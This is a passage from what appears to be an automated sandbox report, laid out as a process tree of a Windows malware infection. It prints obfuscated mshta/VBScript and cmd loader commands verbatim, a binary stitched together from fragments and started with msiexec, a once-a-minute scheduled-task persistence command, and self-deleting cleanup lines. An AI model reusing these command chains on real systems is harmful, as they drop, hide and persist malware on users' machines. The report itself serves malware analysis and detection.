                                                                                                                  "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\4741445.exe" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\4741445.exe" ) do taskkill -f -Im "%~NXZ"
                                                                                                                  11⤵
                                                                                                                    PID:6900
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill -f -Im "4741445.exe"
                                                                                                                      12⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:4308
                                                                                                              • C:\Users\Admin\AppData\Local\6810309.exe
                                                                                                                "C:\Users\Admin\AppData\Local\6810309.exe"
                                                                                                                9⤵
                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                PID:8096
                                                                                                              • C:\Users\Admin\AppData\Local\6594567.exe
                                                                                                                "C:\Users\Admin\AppData\Local\6594567.exe"
                                                                                                                9⤵
                                                                                                                  PID:6668
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1012
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1752
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4700
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                  9⤵
                                                                                                                    PID:7148
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                      10⤵
                                                                                                                        PID:2840
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                          11⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:6788
                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                            12⤵
                                                                                                                              PID:7324
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                13⤵
                                                                                                                                  PID:7624
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                12⤵
                                                                                                                                  PID:704
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                    13⤵
                                                                                                                                      PID:6456
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                        14⤵
                                                                                                                                          PID:6228
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                          14⤵
                                                                                                                                            PID:7784
                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            msiexec -Y ..\lXQ2g.WC
                                                                                                                                            14⤵
                                                                                                                                              PID:4312
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                        11⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:7868
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                  8⤵
                                                                                                                                    PID:4732
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-H65DI.tmp\setup.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-H65DI.tmp\setup.tmp" /SL5="$10476,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                      9⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:2944
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                        10⤵
                                                                                                                                          PID:6508
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-6GBTF.tmp\setup.tmp
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-6GBTF.tmp\setup.tmp" /SL5="$2047E,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                            11⤵
                                                                                                                                              PID:6788
                                                                                                                                              • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                                                                                                                                "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                                                                                                                                12⤵
                                                                                                                                                  PID:7112
                                                                                                                                                  • C:\c8902110be82350f7e\Setup.exe
                                                                                                                                                    C:\c8902110be82350f7e\\Setup.exe /q /norestart /x86 /x64 /web
                                                                                                                                                    13⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:1768
                                                                                                                                                • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                                                                                                                                  "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                                                                                                                                  12⤵
                                                                                                                                                    PID:6708
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-GBR89.tmp\postback.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-GBR89.tmp\postback.exe" ss1
                                                                                                                                                    12⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:2888
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                            8⤵
                                                                                                                                              PID:5660
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\askinstall25.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"
                                                                                                                                              8⤵
                                                                                                                                                PID:6136
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                8⤵
                                                                                                                                                  PID:5424
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                  8⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:2456
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                    9⤵
                                                                                                                                                      PID:5532
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
                                                                                                                                                        10⤵
                                                                                                                                                          PID:6964
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1a0,0x1e8,0x7ff84ac7dec0,0x7ff84ac7ded0,0x7ff84ac7dee0
                                                                                                                                                            11⤵
                                                                                                                                                              PID:3988
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --mojo-platform-channel-handle=2088 /prefetch:8
                                                                                                                                                              11⤵
                                                                                                                                                                PID:6268
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --mojo-platform-channel-handle=1760 /prefetch:8
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:4012
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1712 /prefetch:2
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:5288
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2624 /prefetch:1
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:5608
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2612 /prefetch:1
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:6228
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --mojo-platform-channel-handle=2896 /prefetch:8
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:4448
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3208 /prefetch:2
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:424
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --mojo-platform-channel-handle=3552 /prefetch:8
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:6636
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --mojo-platform-channel-handle=3744 /prefetch:8
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:2348
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --mojo-platform-channel-handle=3732 /prefetch:8
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:4852
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1696,4647441085229587316,5001375206225016113,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_1572797645" --mojo-platform-channel-handle=2800 /prefetch:8
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:7832
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:2144
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:7344
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:5748
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:6224
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\2asU9eoJfqCxDXxxZE5dDrF5.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\2asU9eoJfqCxDXxxZE5dDrF5.exe"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5284
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:5692
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:4120
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 556
                                                                                                                                                                                          9⤵
                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:5684
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Underdress.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Underdress.exe
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:5724
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:6292
                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\FCfqMQdRXWRau3r1BJBevGYl.exe
                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\FCfqMQdRXWRau3r1BJBevGYl.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          PID:5276
                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\pwrFbAAdwKDa6zC20BjNeb_P.exe
                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\pwrFbAAdwKDa6zC20BjNeb_P.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                          PID:5260
                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\8Yv1mdqXBV_7unl9Nau8UsiA.exe
                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\8Yv1mdqXBV_7unl9Nau8UsiA.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:5252
                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\LHhbREllaHpMEPc1aMRW10bD.exe
                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\LHhbREllaHpMEPc1aMRW10bD.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5244
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xdsagfgdfgbbv.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\xdsagfgdfgbbv.exe"
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:4792
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD879.tmp.cmd""
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                  PID:1196
                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                    timeout 4
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:7280
                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                    schtasks.exe /create /f /sc MINUTE /mo 1 /tn "XLiveDriverApiSound" /tr "'C:\ProgramData\DriverXLiveEditor\XLiveDriverApiSound.exe"'
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:3900
                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\PCVS9q3PdfETimCxVsQyYc09.exe
                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\PCVS9q3PdfETimCxVsQyYc09.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                              PID:5232
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\PCVS9q3PdfETimCxVsQyYc09.exe" & exit
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:7316
                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                    timeout /t 5
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:1916
                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Dpi3kOyKxHAmq46XXiIKpRhu.exe
                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Dpi3kOyKxHAmq46XXiIKpRhu.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:5224
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 312
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:5628
                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\SiqJ6maRgz6CS_7VgbteoUJ1.exe
                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\SiqJ6maRgz6CS_7VgbteoUJ1.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                PID:5216
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\SiqJ6maRgz6CS_7VgbteoUJ1.exe" & exit
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:7684
                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                      timeout /t 5
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                      PID:7720
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\hUw9D54QfeRhhP0V8VI7ODby.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\hUw9D54QfeRhhP0V8VI7ODby.exe"
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:5200
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\qcDRPGRkAjDcekDW0aW8OJlE.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\qcDRPGRkAjDcekDW0aW8OJlE.exe"
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  PID:5196
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\LFr5U4AJuhOsXdrGwcY8GZRY.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\LFr5U4AJuhOsXdrGwcY8GZRY.exe"
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:5160
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\LFr5U4AJuhOsXdrGwcY8GZRY.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\LFr5U4AJuhOsXdrGwcY8GZRY.exe"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:6996
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\yvOD7s1YY7vumSvLAp_y5L3t.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\yvOD7s1YY7vumSvLAp_y5L3t.exe"
                                                                                                                                                                                                    7⤵
